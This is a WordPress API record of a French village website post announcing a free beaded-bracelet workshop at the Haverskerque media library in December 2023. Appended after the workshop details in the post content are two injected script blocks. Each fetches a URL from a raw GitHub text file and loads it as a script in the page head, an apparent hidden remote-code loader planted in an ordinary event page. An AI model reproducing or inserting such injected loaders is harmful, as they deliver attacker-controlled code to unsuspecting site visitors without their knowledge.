{"id":5473,"date":"2023-12-11T12:08:16","date_gmt":"2023-12-11T11:08:16","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=5473"},"modified":"2024-07-29T06:37:49","modified_gmt":"2024-07-29T04:37:49","slug":"atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/","title":{"rendered":"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9"},"content":{"rendered":"\n<p><strong><br>Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9<\/strong><\/p>\n\n\n\n<p>La m\u00e9diath\u00e8que M\u00e9di@lys d&rsquo;Haverskerque organise un atelier de conception de bracelets vertueux le mercredi 20 d\u00e9cembre 2023. L&rsquo;atelier se d\u00e9roulera en trois sessions de 1h30 chacune. Cet atelier est ouvert \u00e0 tous, quel que soit votre \u00e2ge ou votre niveau de comp\u00e9tence.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"469\" height=\"665\" src=\"http:\/\/barbry.esy.es\/wp-content\/uploads\/2023\/12\/cafe_a_theme_litho-00948-1.jpg\" alt=\"\" class=\"wp-image-5475\" srcset=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/cafe_a_theme_litho-00948-1.jpg 469w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/cafe_a_theme_litho-00948-1-212x300.jpg 212w\" sizes=\"auto, (max-width: 469px) 100vw, 469px\" \/><\/figure>\n<\/div>\n\n\n<p>Lors de cet atelier, vous apprendrez \u00e0 cr\u00e9er vos propres bracelets en utilisant des pierres et des perles. Vous d\u00e9couvrirez les propri\u00e9t\u00e9s des pierres et les vertus qu&rsquo;elles peuvent apporter. Vous pourrez \u00e9galement choisir les couleurs et les motifs qui vous plaisent.<\/p>\n\n\n\n<p>Cet atelier est l&rsquo;occasion de passer un moment de d\u00e9tente et de cr\u00e9ativit\u00e9, tout en apprenant de nouvelles choses sur les pierres .<\/p>\n\n\n\n<p><strong>Les informations pratiques<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Date :<\/strong>&nbsp;mercredi 20 d\u00e9cembre 2023<\/li>\n\n\n\n<li><strong>Heure :<\/strong>&nbsp;de 14h \u00e0 19h (3 ateliers de 1h30)<\/li>\n\n\n\n<li><strong>Lieu :<\/strong>&nbsp;M\u00e9diath\u00e8que M\u00e9di@lys, rue du Bellot, Haverskerque<\/li>\n\n\n\n<li><strong>Tarif :<\/strong>&nbsp;gratuit<\/li>\n<\/ul>\n\n\n\n<p><strong>R\u00e9servation obligatoire<\/strong><\/p>\n\n\n\n<p>&#8211; En m\u00e9diath\u00e8que d&rsquo;Haverskerque, rue du Bellot<br>&#8211; Par t\u00e9l\u00e9phone : 06 07 65 78 66<br>&#8211; Par mail medialys@haverskerque.fr<\/p>\n\n\n\n<p><strong>Ce que vous apprendrez<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Les propri\u00e9t\u00e9s des pierres <\/li>\n\n\n\n<li>Comment choisir les pierres et les perles qui vous correspondent<\/li>\n\n\n\n<li>Les techniques de base pour cr\u00e9er un bracelet<\/li>\n<\/ul>\n\n\n\n<p><strong>Ce que vous pourrez faire<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Cr\u00e9er votre propre bracelet unique<\/li>\n\n\n\n<li>Apprendre de nouvelles choses sur les pierres <\/li>\n\n\n\n<li>Passer un moment de d\u00e9tente et de cr\u00e9ativit\u00e9<\/li>\n<\/ul>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9 La m\u00e9diath\u00e8que M\u00e9di@lys d&rsquo;Haverskerque organise un atelier de conception de bracelets vertueux le mercredi 20 d\u00e9cembre 2023. L&rsquo;atelier se d\u00e9roulera en trois sessions de 1h30 chacune. Cet atelier est ouvert \u00e0 tous, quel que soit votre \u00e2ge ou votre niveau de comp\u00e9tence. Lors de cet atelier, vous apprendrez \u00e0 cr\u00e9er vos propres bracelets en utilisant des pierres et des perles. Vous d\u00e9couvrirez les propri\u00e9t\u00e9s des pierres et les vertus qu&rsquo;elles peuvent apporter. Vous pourrez \u00e9galement choisir les couleurs et les motifs qui vous plaisent. Cet atelier est l&rsquo;occasion de passer un moment de d\u00e9tente et de cr\u00e9ativit\u00e9, tout en apprenant de nouvelles choses sur les pierres . Les informations pratiques R\u00e9servation obligatoire &#8211; En m\u00e9diath\u00e8que d&rsquo;Haverskerque, rue du Bellot&#8211; Par t\u00e9l\u00e9phone : 06 07 65 78 66&#8211; Par mail medialys@haverskerque.fr Ce que vous apprendrez Ce que vous pourrez faire<\/p>\n","protected":false},"author":1,"featured_media":5474,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[7],"tags":[],"class_list":["post-5473","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-rendez-vous"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9 La m\u00e9diath\u00e8que M\u00e9di@lys d&rsquo;Haverskerque organise un atelier de conception de bracelets vertueux le mercredi 20 d\u00e9cembre 2023. L&rsquo;atelier se d\u00e9roulera en trois sessions de 1h30 chacune. Cet atelier est ouvert \u00e0 tous, quel que soit votre \u00e2ge ou votre niveau de comp\u00e9tence. Lors de cet atelier, vous apprendrez \u00e0 cr\u00e9er vos propres bracelets en utilisant des pierres et des perles. Vous d\u00e9couvrirez les propri\u00e9t\u00e9s des pierres et les vertus qu&rsquo;elles peuvent apporter. Vous pourrez \u00e9galement choisir les couleurs et les motifs qui vous plaisent. Cet atelier est l&rsquo;occasion de passer un moment de d\u00e9tente et de cr\u00e9ativit\u00e9, tout en apprenant de nouvelles choses sur les pierres . Les informations pratiques R\u00e9servation obligatoire &#8211; En m\u00e9diath\u00e8que d&rsquo;Haverskerque, rue du Bellot&#8211; Par t\u00e9l\u00e9phone : 06 07 65 78 66&#8211; Par mail medialys@haverskerque.fr Ce que vous apprendrez Ce que vous pourrez faire\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2023-12-11T11:08:16+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:37:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/une-bracelet-vertueux.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"628\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9\",\"datePublished\":\"2023-12-11T11:08:16+00:00\",\"dateModified\":\"2024-07-29T04:37:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/\"},\"wordCount\":256,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/12\\\/une-bracelet-vertueux.jpg\",\"articleSection\":[\"Rendez-vous\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/\",\"name\":\"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/12\\\/une-bracelet-vertueux.jpg\",\"datePublished\":\"2023-12-11T11:08:16+00:00\",\"dateModified\":\"2024-07-29T04:37:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/11\\\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/","og_locale":"fr_FR","og_type":"article","og_title":"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9 * Haverskerque, 100% Nature !*","og_description":"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9 La m\u00e9diath\u00e8que M\u00e9di@lys d&rsquo;Haverskerque organise un atelier de conception de bracelets vertueux le mercredi 20 d\u00e9cembre 2023. L&rsquo;atelier se d\u00e9roulera en trois sessions de 1h30 chacune. Cet atelier est ouvert \u00e0 tous, quel que soit votre \u00e2ge ou votre niveau de comp\u00e9tence. Lors de cet atelier, vous apprendrez \u00e0 cr\u00e9er vos propres bracelets en utilisant des pierres et des perles. Vous d\u00e9couvrirez les propri\u00e9t\u00e9s des pierres et les vertus qu&rsquo;elles peuvent apporter. Vous pourrez \u00e9galement choisir les couleurs et les motifs qui vous plaisent. Cet atelier est l&rsquo;occasion de passer un moment de d\u00e9tente et de cr\u00e9ativit\u00e9, tout en apprenant de nouvelles choses sur les pierres . Les informations pratiques R\u00e9servation obligatoire &#8211; En m\u00e9diath\u00e8que d&rsquo;Haverskerque, rue du Bellot&#8211; Par t\u00e9l\u00e9phone : 06 07 65 78 66&#8211; Par mail medialys@haverskerque.fr Ce que vous apprendrez Ce que vous pourrez faire","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2023-12-11T11:08:16+00:00","article_modified_time":"2024-07-29T04:37:49+00:00","og_image":[{"width":1200,"height":628,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/une-bracelet-vertueux.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9","datePublished":"2023-12-11T11:08:16+00:00","dateModified":"2024-07-29T04:37:49+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/"},"wordCount":256,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/une-bracelet-vertueux.jpg","articleSection":["Rendez-vous"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/","name":"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/une-bracelet-vertueux.jpg","datePublished":"2023-12-11T11:08:16+00:00","dateModified":"2024-07-29T04:37:49+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/11\/atelier-de-bracelets-vertueux-un-moment-de-detente-et-de-creativite\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Atelier de bracelets vertueux : un moment de d\u00e9tente et de cr\u00e9ativit\u00e9"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/5473","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=5473"}],"version-history":[{"count":3,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/5473\/revisions"}],"predecessor-version":[{"id":8267,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/5473\/revisions\/8267"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/5474"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=5473"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=5473"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=5473"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}